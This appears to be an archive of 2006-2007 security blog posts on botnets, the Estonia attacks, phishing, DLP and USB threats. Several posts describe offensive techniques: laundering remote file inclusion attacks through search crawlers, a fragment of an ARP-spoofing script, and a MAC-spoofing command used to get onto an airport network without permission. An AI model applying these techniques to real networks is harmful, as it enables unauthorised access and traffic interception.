eWeek: Estonian Cyber-War Highlights Civilian Vulnerabilities

i posted a column on eweek on what critical infrastructure means, looking back at the estonia incident.

they edited out some of what i had to say on home computers and their impact as a critical infrasrtcuture, but hey, word limitations.


Gadi Evron,


Ecards and email filtering

in the past two weeks, ecards became a major threat.

ecards (or electronic greeting cards) were always a perfect social engineering scheme, open for abuse. with the storm worm and massive exploitation, i believe it has become prudent to filter out all ecard messages in your email systems.

further, some training or awareness information on this subject distributed to your organizations could be very useful.

gadi evron,


Alternative Botnet C&Cs – free chapter from Botnets: The Killer Web App

syngress was kind enough to allow me to post the chapter i wrote for botnets: the killer web application here as a free sample.

it is the third chapter in the book, and requires some prior knowledge of what a botnet c&c (command and control) is. it is basic, short, and to my belief covers quite a bit. it had to be short, as i had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion. ;)

you can download it from this link:

for the full book, you would need to spend the cash.


gadi evron,


The attacks on Estonia by Russians (or Russia?)

people have been wondering why i’ve been keeping quiet on this issue, especially since i was right there helping out.

a lot of people had information to share and emotions to get out of the way. also, it was really not my place reply on this – with all the work done by the estonians, my contributions were secondary. mr. alexander harrowell discussed this with me off mailing lists, and our discussions are public on his blog. information from bill woodcock on nanog was also sound.

as to what actually happened over there, more information should become available soon and i will send it here. i keep getting stuck when trying to write the post-mortem and attack/defense analysis as i keep hitting a stone wall i did not expect: strategy. suggestions for the future is also a part of that document, so i will speed it up with a more down-to-earth technical analysis (which is what i promised cert-ee).

in the past i’ve been able to consider information warfare as a part of a larger strategy, utilizing it as a weapon. i was able to think of impact and tools, not to mention (mostly) disconnected attacks and defenses.

i keep seeing strategy for the use in information warfare battles as i write this document on what happened in estonia, and i believe i need more time to explore this against my previous take on the issue, as well as take a look at some classics such as clausewitz, as posh as
it may sound.


gadi evron,


Targeted or not targeted?

many of us have been having discussions and arguments over if the recent bbb phishing attacks are targeted or not.

thinking on this, i believe the better equivalent which may solve our terminology disagreements on if these bbb phishing emails were targeted or not would be “targeted spam” as a tried concept. we can assume, although in some cases incorrectly, that spam is bulk.

usually, spam goes to “lists” of addresses, harvested. sometimes it is targeted to a certain audience. but there are other types of lists, not just of addresses and interests.

it is possible to buy lists of addresses of people who attended rsa and visited booths, for example. or any other number of trade-shows. it is possible to harvest linkedin, etc.

my take is that this attack is targeted in the sense that it goes to certain individual types only, but is quite mundane and bulk in the type.

we need terms for individual/close-to attacks and attacks by targeting an audience, still in bulk.

gadi evron,


Hacker OpSec and the State Department

Dave Aitel sent this one in, and it’s a good one:


A Botted Fortune 500 a Day

support intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

you can find more information on their blog:

they are good people, and they know botnets.

gadi evron,


Al-Qaeda’s planned attack in London – that’s why we need CPNI

The recent Times Online report Al-Qaeda plot to bring down UK internet shows that massive terrorism operations are being prepared still. The target was the headquarters of Telehouse Europe located in Docklands, London.


The discovery led Eliza Manningham-Buller, head of MI5, to set up the Centre for the Protection of National Infrastructure last month. It is a special MI5 unit…

There are several Internet Exchange Points in London, but we don’t know if this was the only target being planned.

What CPNI? The unit was founded on 1st February and there is no NISCC (National Infrastructure Security Co-ordination Centre) any more.

It appears that Telehouse Docklands has detailed Building Specifications listed at their Main page(!).


Botnets: a retrospective to 2006, and where we are headed in 2007

a few months back i released a post on where i think anti-botnets technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. this is why i will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

what changed with botnets in 2006:

1.botnets reached a level where it is unclear today what parts of the internet are not compromised to an extent. count by clean rather than infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime are launched. botnets equal an online infrastructure for abusive or criminal activity online.
3. in the past year, botnets have become mainstream. from a not existent field even in the professional realm up to a few years ago, where attacks were happening constantly reagrdless, it has turned to the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one the most significant form of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered, such as dns and irc on the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

what’s going to happen with botnets in 2007:

botnets won’t change. all will remain the same as it has been for years. awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. the bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shame-less and open show of strength to those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

gadi evron,


Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:

google will harvest this url, visit the site using its crawler and index it.
meaning accessing the target site with the url it was provided and exploiting it unwittingly for whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:

and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)


Team Evil – Incident #2

Earlier this year, Beyond Security’s beSIRT released an incident response forensic analysis of a defacement attack by Team Evil [Team Evil Incident (Cyber-terrorism defacement analysis and response)].

The PDF itself can be found here:


A follow up is being released today, on a second incident. Following what Team Evil did, their methodology and how it changed since the first document was released.

The aim of this document is more to show how such analysis is done, on an educational note. The PDF can be found here:


We hope you find this useful.



Me All – For your wifi pentesting pleasure

Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listen for ARP requests and responds to any such requests with … Hay That is Me ™ :) … The things you can find using that… here is a summary:

1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you answered the DNS queries, and have set Apache to answer incoming connections you are all set)

I am sure a lot more can be done… I will leave it to your imagination

# Writen by Noam Rathaus, Beyond Security (r)

use Net::Pcap;

my $Interface = “eth1″;


DLP on the rise: McAfee buys Israeli startup Onigma for $15-25 million

according to this new article at haaretz, mcafee bought israeli startup onigma for 15 to 25 million usd.

onigma is a company working on dlp (data leakage prevention). according to the article by raphael fogel, mcafee will work to integrate this technology in their enterprise security solution, as well as recruit more developers to establish an r&d center in israel.

“the technology enables the company to monitor all its workers and ensure they do not send confidential information beyond the enterprise boundaries, whether via internet or external memory storage devices.”

dlp is a growing field with many startup competitors. i am not at all sure how effective this technolgoy is, but it comes as an answer to growing concerns in many organizations to protect against sensitive information leaking out.

how this field will develop is indeed interesting, and this buy by mcafee may possibly indicate dlp becoming the new buzzwork which anti virus vendors will use to advance their solutions.

whether this technology is successful or not, we are going to hear a lot more about it. the buy is interesting on its own, and it will also be interesting to see what other companies knee-jerk now to buy a foothold in this growing field (whether by the merit of the technology or by the lack of other solutions).

gadi evron,


USB Attacks Going Commercial?

in the public hacking world, so far we have mostly seen usb technology from security vendors… not the attackers side.

a few years ago we had discussions on pen-test, and later bugtraq and fd on these risks, following an article in 2600 and a post from me on the risks digest. on pen-test, harlan carvey and others also followed up.
since then there have been multiple threads everywhere. this was not new back then, either, imo.

back then i mainly addressed the risk of driver attacks (now more acknowledged since blackhat 2005 and blackhat 2006 presentations on the subject appeared), and didn’t get much attention. hackers did not know usb technology that well and most did not see what the heck drivers had to do with it.

what did come up were the risks of autorun technology (which is a simple solution to making usb devices execute code). these were not as easy as they first appeared, and did not work if windows xp’s screen saver was active. still, things were interesting and my fav quote of: the janitor is the richest person in the organization, got some interest.

today, with several usb buffer overflow discovered (mostly in the linux kernel) and driver attacks getting more attention, i came across the following blog entry by xavier ashe.

in his blog he discusses a usb autorun technology which is actually an hacking tool, (more…)


ATM hack

dd had a nice post today by halvar on an atm fraud:

according to a nathan landon who provided with more details:

they showed it on the news here in virginia. they have security camera footage of the guy who they believe is the perpetrator trying to pull out $250 and getting $1000. he did this twice apparently. he doesn’t look like the “engineer” type. they reported that he was able to turn on the glitch through a series of entered numbers. doubtful he knew what he was doing otherwise he could have turned it off between attempts. (more…)


Wireless not working? go Wired

I arrived at Ataturk Airport (for those who don’t know its located in Turkey), and found out their Wireless network is worth … wait it … shit … You can hardly get a signal, I stood near the Free Wireless Access(tm) sign and got less than 15% signal, frustrated, I decided to go the extra mile.

The Turks are really nice, they provide Internet access points to people sitting in the travelers lounge, these Internet access points are connected via Ethernet. I decided to give it a shot and plugged my laptop to the socket… damn, nothing … most have a sophisticated IDS/IPS/ACL/NOC/[Insert buzzword] device blocking me. Not yet ready to lose the war… was I at war? :) … I decided to issue this command:
ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX

Where I replaced the XX:XX:XX:XX:XX:XX with the MAC address of the Internet access point which I sniffed using Wireshark ™ – known in the past as Ethereal – and voula, “free” Ethernet based access to the network… though wired :(

I am sure the guys at the security department were telling jokes, think of the poor bastard that will plug his laptop and see that it won’t work … mohahaa…, but hey, I guess you need to get smarter, MAC address are no means of detecting the remote computer’s identity :)

That is it for now. C’ya